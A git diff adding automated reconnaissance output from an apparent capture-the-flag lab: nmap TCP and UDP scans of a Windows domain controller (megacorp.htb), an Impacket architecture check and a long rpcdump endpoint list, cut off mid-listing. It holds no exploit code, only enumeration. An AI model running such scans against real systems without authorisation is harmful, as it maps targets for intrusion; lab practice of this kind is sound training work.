user-set (0.061s latency). +Scanned at 2023-10-28 14:23:46 CEST for 449s +Not shown: 988 filtered tcp ports (no-response) +PORT STATE SERVICE REASON VERSION +53/tcp open domain? syn-ack ttl 127 +80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 +|_http-title: Slandovia Energy +| http-methods: +| Supported Methods: OPTIONS TRACE GET HEAD POST +|_ Potentially risky methods: TRACE +88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-28 12:23:58Z) +135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn +389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +445/tcp open microsoft-ds? syn-ack ttl 127 +464/tcp open kpasswd5? syn-ack ttl 127 +593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 +636/tcp open tcpwrapped syn-ack ttl 127 +3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) +3269/tcp open tcpwrapped syn-ack ttl 127 +Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port +OS fingerprint not ideal because: Missing a closed TCP port so results incomplete +No OS matches for host +TCP/IP fingerprint: +SCAN(V=7.93%E=4%D=10/28%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=653CFF13%P=x86_64-pc-linux-gnu) +SEQ(SP=108%GCD=1%ISR=10A%TS=U) +OPS(O1=M550NW8NNS%O2=M550NW8NNS%O3=M550NW8%O4=M550NW8NNS%O5=M550NW8NNS%O6=M550NNS) +WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70) +ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M550NW8NNS%CC=Y%Q=) +T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=) +T2(R=N) +T3(R=N) +T4(R=N) +U1(R=N) +IE(R=Y%DFI=N%TG=80%CD=Z) + +Network Distance: 2 hops +TCP Sequence Prediction: Difficulty=264 (Good luck!) +IP ID Sequence Generation: Busy server or unknown class +Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows + +Host script results: +| smb2-security-mode: +| 311: +|_ Message signing enabled and required +|_clock-skew: 0s +| smb2-time: +| date: 2023-10-28T12:30:36 +|_ start_date: N/A +| p2p-conficker: +| Checking for Conficker.C or higher... +| Check 1 (port 25314/tcp): CLEAN (Timeout) +| Check 2 (port 10793/tcp): CLEAN (Timeout) +| Check 3 (port 25536/udp): CLEAN (Timeout) +| Check 4 (port 25523/udp): CLEAN (Timeout) +|_ 0/4 checks are positive: Host is CLEAN or ports are blocked + +TRACEROUTE (using port 53/tcp) +HOP RTT ADDRESS +1 74.01 ms 10.10.14.1 +2 74.05 ms megacorp.htb (10.129.243.131) + +Read data files from: /usr/bin/../share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:31:15 2023 -- 1 IP address (1 host up) scanned in 449.29 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt new file mode 100644 index 00000000..3c8842ba --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt @@ -0,0 +1,38 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:23:46 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.055s latency). +Scanned at 2023-10-28 14:23:46 CEST for 1767s +Not shown: 97 open|filtered udp ports (no-response) +PORT STATE SERVICE REASON VERSION +53/udp open domain udp-response (generic dns response: SERVFAIL) +| fingerprint-strings: +| NBTStat: +|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +88/udp open kerberos-sec udp-response Microsoft Windows Kerberos (server time: 2023-10-28 12:23:58Z) +123/udp open ntp udp-response ttl 127 NTP v3 +| ntp-info: +|_ receive time stamp: 2023-10-28T12:30:46 +1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : +SF-Port53-UDP:V=7.93%I=7%D=10/28%Time=653CFD6C%P=x86_64-pc-linux-gnu%r(NBT +SF:Stat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAA +SF:AAAAAAAA\0\0!\0\x01"); +Too many fingerprints match this host to give specific OS details +TCP/IP fingerprint: +SCAN(V=7.93%E=4%D=10/28%OT=%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=653D0439%P=x86_64-pc-linux-gnu) +U1(R=N) +IE(R=N) + +Network Distance: 2 hops +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows + +Host script results: +|_clock-skew: 14s + +TRACEROUTE (using port 123/udp) +HOP RTT ADDRESS +1 44.38 ms 10.10.14.1 +2 57.06 ms megacorp.htb (10.129.243.131) + +Read data files from: /usr/bin/../share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:53:13 2023 -- 1 IP address (1 host up) scanned in 1767.23 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt new file mode 100644 index 00000000..1b90fd81 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt @@ -0,0 +1,6 @@ +Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation + +[*] Gathering OS architecture for 1 machines +[*] Socket connect timeout set to 2 secs +10.129.243.131 is 64-bit + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt new file mode 100644 index 00000000..50dbfb88 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt @@ -0,0 +1,12 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:27:53 2023 as: nmap -vv --reason -Pn -T4 -sV -p 135 --script=banner,msrpc-enum,rpc-grind,rpcinfo -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.62s latency). +Scanned at 2023-10-28 14:27:56 CEST for 23s + +PORT STATE SERVICE REASON VERSION +135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:28:19 2023 -- 1 IP address (1 host up) scanned in 26.49 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt new file mode 100644 index 00000000..51fd1598 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt @@ -0,0 +1,880 @@ +Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation + +[*] Retrieving endpoint list from 10.129.243.131 +Protocol: [MS-RSP]: Remote Shutdown Protocol +Provider: wininit.exe +UUID : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49664] + ncalrpc:[WindowsShutdown] + ncacn_np:\\DC[\PIPE\InitShutdown] + ncalrpc:[WMsgKRpc089280] + +Protocol: N/A +Provider: winlogon.exe +UUID : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0 +Bindings: + ncalrpc:[WindowsShutdown] + ncacn_np:\\DC[\PIPE\InitShutdown] + ncalrpc:[WMsgKRpc089280] + ncalrpc:[WMsgKRpc08A621] + +Protocol: N/A +Provider: N/A +UUID : D09BDEB5-6171-4A34-BFE2-06FA82652568 v1.0 +Bindings: + ncalrpc:[csebpub] + ncalrpc:[LRPC-6b54d635557b62ca53] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-9e83194e1e5674c55f] + ncalrpc:[LRPC-a91e72435259adddfa] + +Protocol: N/A +Provider: N/A +UUID : 697DCDA9-3BA9-4EB2-9247-E11F1901B0D2 v1.0 +Bindings: + ncalrpc:[LRPC-6b54d635557b62ca53] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 9B008953-F195-4BF9-BDE0-4471971E58ED v1.0 +Bindings: + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : DD59071B-3215-4C59-8481-972EDADC0F6A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0D47017B-B33B-46AD-9E18-FE96456C5078 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 95406F0B-B239-4318-91BB-CEA3A46FF0DC v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4ED8ABCC-F1E2-438B-981F-BB0E8ABC010C v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0FF1F646-13BB-400A-AB50-9A78F2B7A85A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 6982A06E-5FE2-46B1-B39C-A2C545BFA069 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 082A3471-31B6-422A-B931-A54401960C62 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : FAE436B0-B864-4A87-9EDA-298547CD82F2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : E53D94CA-7464-4839-B044-09A2FB8B3AE5 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 178D84BE-9291-4994-82C6-3F909ACA5A03 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4DACE966-A243-4450-AE3F-9B7BCB5315B8 v2.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 1832BCF6-CAB8-41D4-85D2-C9410764F75A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : C521FACF-09A9-42C5-B155-72388595CBF0 v0.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2C7FD9CE-E706-4B40-B412-953107EF9BB0 v0.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 88ABCBC3-34EA-76AE-8215-767520655A23 v0.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 76C217BC-C8B4-4201-A745-373AD9032B1A v1.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 55E6B932-1979-45D6-90C5-7F6270724112 v1.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 857FB1BE-084F-4FB5-B59C-4B2C4BE5F0CF v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : B8CADBAF-E84B-46B9-84F2-6F71C03F9E55 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 20C40295-8DBA-48E6-AEBF-3E78EF3BB144 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2513BCBE-6CD4-4348-855E-7EFB3C336DD3 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0D3E2735-CEA0-4ECC-A9E2-41A2D81AED4E v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : C605F9FB-F0A3-4E2A-A073-73560F8D9E3E v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 1B37CA91-76B1-4F5E-A3C7-2ABFC61F2BB0 v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 8BFC3BE1-6DEF-4E2D-AF74-7C47CD0ADE4A v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2D98A740-581D-41B9-AA0D-A88B9D5CE938 v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0361AE94-0316-4C6C-8AD8-C594375800E2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 5824833B-3C1A-4AD2-BDFD-C31D19E23ED2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : BDAA0970-413B-4A3E-9E5D-F6DC9D7E0760 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 3B338D89-6CFA-44B8-847E-531531BC9992 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 8782D3B9-EBBD-4644-A3D8-E8725381919B v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 085B0334-E454-4D91-9B8C-4134F9E793F3 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4BEC6BB8-B5C2-4B6F-B2C1-5DA5CF92D0D9 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: sysntfy.dll +UUID : C9AC6DB5-82B7-4E55-AE8A-E464ED7B4277 v1.0 Impl friendly name +Bindings: + ncalrpc:[LRPC-78c65697da0c3cb9e7] + ncalrpc:[LRPC-5d1d91fbc9832f3673] + ncalrpc:[IUserProfile2] + ncalrpc:[LRPC-7f9f9d7e564fa27a15] + ncalrpc:[senssvc] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + ncalrpc:[LRPC-2d7a6fcd1e6a5d90b0] + ncalrpc:[OLE59700168EED37EDF88950A0917DC] + +Protocol: N/A +Provider: nsisvc.dll +UUID : 7EA70BCF-48AF-4F6A-8968-6A440754D5FA v1.0 NSI server endpoint +Bindings: + ncalrpc:[LRPC-9ec11ee764d799175d] + +Protocol: N/A +Provider: nrpsrv.dll +UUID : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint +Bindings: + ncalrpc:[LRPC-99bbae991f0f6e961a] + +Protocol: N/A +Provider: N/A +UUID : E40F7B57-7A25-4CD3-A135-7F7D3DF9D16B v1.0 Network Connection Broker server endpoint +Bindings: + ncalrpc:[LRPC-95313533ddc887d499] + ncalrpc:[OLE11E1ADACE4D3F3328245D6CF61B4] + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : 880FD55E-43B9-11E0-B1A8-CF4EDFD72085 v1.0 KAPI Service endpoint +Bindings: + ncalrpc:[LRPC-95313533ddc887d499] + ncalrpc:[OLE11E1ADACE4D3F3328245D6CF61B4] + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : 5222821F-D5E2-4885-84F1-5F6185A0EC41 v1.0 Network Connection Broker server endpoint for NCB Reset module +Bindings: + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : A500D4C6-0DD1-4543-BC0C-D5F93486EAF8 v1.0 +Bindings: + ncalrpc:[LRPC-7d4055d4f64c73ef42] + ncalrpc:[LRPC-a91e72435259adddfa] + +Protocol: N/A +Provider: dhcpcsvc.dll +UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint +Bindings: + ncalrpc:[dhcpcsvc] + ncalrpc:[dhcpcsvc6] + +Protocol: N/A +Provider: dhcpcsvc6.dll +UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint +Bindings: + ncalrpc:[dhcpcsvc6] + +Protocol: [MS-EVEN6]: EventLog Remoting Protocol +Provider: wevtsvc.dll +UUID : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP +Bindings: + ncacn_ip_tcp:10.129.243.131[49665] + ncacn_np:\\DC[\pipe\eventlog] + ncalrpc:[eventlog] + +Protocol: N/A +Provider: gpsvc.dll +UUID : 2EB08E3E-639F-4FBA-97B1-14F878961076 v1.0 Group Policy RPC Interface +Bindings: + ncalrpc:[LRPC-1e815b36ff28d761c1] + +Protocol: N/A +Provider: N/A +UUID : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49666] + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: schedsvc.dll +UUID : 86D35949-83C9-4044-B424-DB363231FD0C v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49666] + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: N/A +UUID : 33D84484-3626-47EE-8C6F-E7E98B113BE1 v2.0 +Bindings: + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: taskcomp.dll +UUID : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0 +Bindings: + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: taskcomp.dll +UUID : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0 +Bindings: + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: schedsvc.dll +UUID : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0 +Bindings: + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: MPSSVC.dll +UUID : 2FB92682-6599-42DC-AE13-BD2CA89BD11C v1.0 Fw APIs +Bindings: + ncalrpc:[LRPC-a3db541015ee3b4092] + ncalrpc:[LRPC-25295713f276d13d17] + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: N/A +UUID : F47433C3-3E9D-4157-AAD4-83AA1F5C2D4C v1.0 Fw APIs +Bindings: + ncalrpc:[LRPC-25295713f276d13d17] + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: MPSSVC.dll +UUID : 7F9D11BF-7FB9-436B-A812-B2D50C5D4C03 v1.0 Fw APIs +Bindings: + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: BFE.DLL +UUID : DD490425-5325-4565-B774-7E27D6C09C24 v1.0 Base Firewall Engine API +Bindings: + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: N/A +UUID : 7F1343FE-50A9-4927-A778-0C5859517BAC v1.0 DfsDs service +Bindings: + ncacn_np:\\DC[\PIPE\wkssvc] + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : EB081A0D-10EE-478A-A1DD-50995283E7A8 v3.0 Witness Client Test Interface +Bindings: + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : F2C9B409-C1C9-4100-8639-D8AB1486694A v1.0 Witness Client Upcall Server +Bindings: + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : C2D1B5DD-FA81-4460-9DD6-E7658B85454B v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : F44E62AF-DAB1-44C2-8013-049A9DE417D6 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : 7AEB6705-3AE6-471A-882D-F39C109EDC12 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : E7F76134-9EF5-4949-A2D6-3368CC0988F3 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : B37F900A-EAE4-4304-A2AB-12BB668C0188 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : ABFB6CA3-0C5E-4734-9285-0AEE72FE8D1C v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : C49A5A70-8A7F-4E70-BA16-1E8F1F193EF1 v1.0 Adh APIs +Bindings: + ncalrpc:[OLE5FCB0823110EF79154A84BC1C955] + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : C36BE077-E14B-4FE9-8ABC-E856EF4F048B v1.0 Proxy Manager client server endpoint +Bindings: + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : 2E6035B2-E8F1-41A7-A044-656B439C4C34 v1.0 Proxy Manager provider server endpoint +Bindings: + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: iphlpsvc.dll +UUID : 552D076A-CB29-4E44-8B6A-D15E59E2C0AF v1.0 IP Transition Configuration endpoint +Bindings: + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : 0D3C7F20-1C8D-4654-A1B3-51563B298BDA v1.0 UserMgrCli +Bindings: + ncalrpc:[LRPC-0f23b80e8c8e8083c8] + ncalrpc:[OLE6A1CCA02AC4BF8BCCEB70B5744EE] + +Protocol: N/A +Provider: N/A +UUID : B18FBAB6-56F8-4702-84E0-41053293A869 v1.0 UserMgrCli +Bindings: + ncalrpc:[LRPC-0f23b80e8c8e8083c8] + ncalrpc:[OLE6A1CCA02AC4BF8BCCEB70B5744EE] + +Protocol: N/A +Provider: N/A +UUID : 51A227AE-825B-41F2-B4A9-1AC9557A1018 v1.0 Ngc Pop Key Service +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + 